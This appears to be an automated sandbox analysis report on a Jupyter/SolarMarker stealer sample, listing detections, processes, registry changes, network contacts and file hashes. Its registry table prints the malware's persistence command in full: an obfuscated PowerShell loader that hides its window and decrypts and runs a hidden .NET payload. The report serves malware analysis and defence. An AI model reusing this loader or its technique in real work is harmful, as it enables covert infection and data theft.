Analysis Overview
SHA256
6828ce39fa7de6c4efabe1c7b6d19213c56d094c12731ff035bd114408e52263
Threat Level: Known bad
The file 1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.7z was found to be: Known bad.
Malicious Activity Summary
suricata: ET MALWARE Jupyter Stealer CnC Checkin
Jupyter, SolarMarker
Jupyter family
Blocklisted process makes network request
Drops startup file
Program crash
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2022-06-13 00:03
Signatures
Jupyter family
Analysis: behavioral1
Detonation Overview
Submitted
2022-06-13 00:01
Reported
2022-06-13 00:09
Platform
win10-20220414-en
Max time kernel
307s
Max time network
311s
Command Line
Signatures
Jupyter, SolarMarker
suricata: ET MALWARE Jupyter Stealer CnC Checkin
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AAkseLakVWShCAFBIqeAz.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\.rhycuoqczmgclvgvil | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\.rhycuoqczmgclvgvil\ = "jplfkwrqxarlkfumjaublhevlrnzqaj" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell\open\command | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell\open | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell\open\command\ = "powershell -command \"$showWindowAsync=Add-Type -MemberDefinition ('['+'D'.ToUpper()+'ll'.ToLower()+'I'.ToUpper()+'mport('.ToLower()+[char]0x22+'user32.dll'.ToLower()+[char]0x22+')]public static extern bool '.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync('.ToLower()+'I'.ToUpper()+'nt'.ToLower()+'P'.ToUpper()+'tr hWnd, int nCmdShow);'.ToLower()) -Name ('W'.ToUpper()+'in32'.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync'.ToLower()) -Namespace Win32Functions -PassThru;$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0);$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('SuzlSBEybt+4l4GorDHHnbdEjW5soZLDzFJs4SVeMJ0=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\AppData\\Local\\Temp\\SuMZpQaKehWXVEkKQuHyLIZz\\ybWylzucNKVPS.rhyCuOqCZmgcLvgvIl'));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[F26y7_MVUpgqQtmoaaDj.RJt6RD8GBp9hWlC5Gbu11nR9257QVV1qfUfdMGc0QJhbcaHbl95wlIt0RvEZQXgar4zx]::UupaQTjrkgVL7jhlnNjwwOfoiDFmEk6eD5fN96jMuScriboS9_bVDY8MwON3Lmr_VqfUsde9ih0S5aB1amydC9k();\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe
"C:\Users\Admin\AppData\Local\Temp\1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ep0525dx\ep0525dx.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFD12.tmp" "c:\Users\Admin\AppData\Local\Temp\ep0525dx\CSC170DC3D0F86249CCA0BE8FEC46F733E.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3728 -s 936
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 20.42.65.90:443 | | tcp |
| RO | 37.120.247.120:80 | 37.120.247.120 | tcp |
Files
memory/3728-117-0x00000000005D0000-0x00000000015D0000-memory.dmp
memory/1016-118-0x0000000000000000-mapping.dmp
memory/1016-123-0x000001594BA40000-0x000001594BA62000-memory.dmp
memory/1016-142-0x0000015964600000-0x000001596463C000-memory.dmp
memory/1016-153-0x00000159646C0000-0x0000015964736000-memory.dmp
memory/3776-230-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\ep0525dx\ep0525dx.cmdline
| MD5 | 99bcd1c19fb29827fb47c00f2f10c264 |
| SHA1 | 93d6c983b6938564a00519eab58da5fa72dc13f4 |
| SHA256 | 8e23f2c03d3ab8f70e1b9c083bfd749219e2327a67efb3c0edd5f15f10df12e9 |
| SHA512 | afdf1f6c0c711d6dcabb35e00c579e83a696fa25c538e07342ba3fb2deb84680e80e1f43ace3f6b6ed1b38694ed85040777c36a673fc1d22c9762fe0a45867cf |
\??\c:\Users\Admin\AppData\Local\Temp\ep0525dx\ep0525dx.0.cs
| MD5 | 2f9b4948ac0b26204994e246094a9f5d |
| SHA1 | 9870e53ad61eba593a2074d2a30202f7e3df09f7 |
| SHA256 | def6ec20884e30f8689cb1ccb8fb62735db528c5277f52f64ecae170cfd49776 |
| SHA512 | ef5f9056b36c8f9204a65b26244f225a9c2cc3bf5b1c46055e6eda06e63769243538b568b29627eb497289777fa69468e64b5eae0fb666bbb2e432a3059154d1 |
memory/160-233-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\ep0525dx\CSC170DC3D0F86249CCA0BE8FEC46F733E.TMP
| MD5 | f75144a068d98ca775e45b05a7609d9f |
| SHA1 | 5af5a7eb16553a66f6013362b439b52be4a80b5a |
| SHA256 | 0399de1e3b7746572693e6f2161e8a31e14608b29304240cf0b967b94b3b45de |
| SHA512 | 9562092f6ee4185d154192424d63bc2a5675f458ce48dd3042075aa85a1af1ea6ab0397a0720ccbeb49516029ec07b7e5d0b0d02ed434fe0dc63928f52f25bda |
C:\Users\Admin\AppData\Local\Temp\RESFD12.tmp
| MD5 | 0b2c9f1a68309a879e2fa3eb0ed42191 |
| SHA1 | f108a9b65bd91d95551f1bbd5cde2d2596364a05 |
| SHA256 | 6cf0e222a3be64aa34fe63baffa1ffba4e0818d2e74a83f74f9d4c7d8030ace3 |
| SHA512 | 69bcb1327f20abf5b8f198fb84a8e9627953e1f2ad95e2ea765b503e54f4630557f14fc851a5b9d65d163e0db91b4770165025a780e4e850c049b2d584c27b45 |
C:\Users\Admin\AppData\Local\Temp\ep0525dx\ep0525dx.dll
| MD5 | 33d01500a8b7aae1f1f9bf7bb0a84ff1 |
| SHA1 | 5ba1575702f2540b0bbf45355ce1c58baf8d2199 |
| SHA256 | b3f5bd1696f11e4409f0c8686b3ef5c66fe58008b9267052cec1563329c29db1 |
| SHA512 | 3f475092c3aa0e776a6532eae919a4205347670bff95d73e5c6960d32009a35e885fb719531ae973c443b200b704608102a0c65f6a372f7e10d9430089ebbca4 |
memory/1016-237-0x00000159642A0000-0x00000159642A8000-memory.dmp
memory/3984-326-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 2143b379fed61ab5450bab1a751798ce |
| SHA1 | 32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e |
| SHA256 | a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81 |
| SHA512 | 0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa |
memory/1016-376-0x0000015964740000-0x00000159647EC000-memory.dmp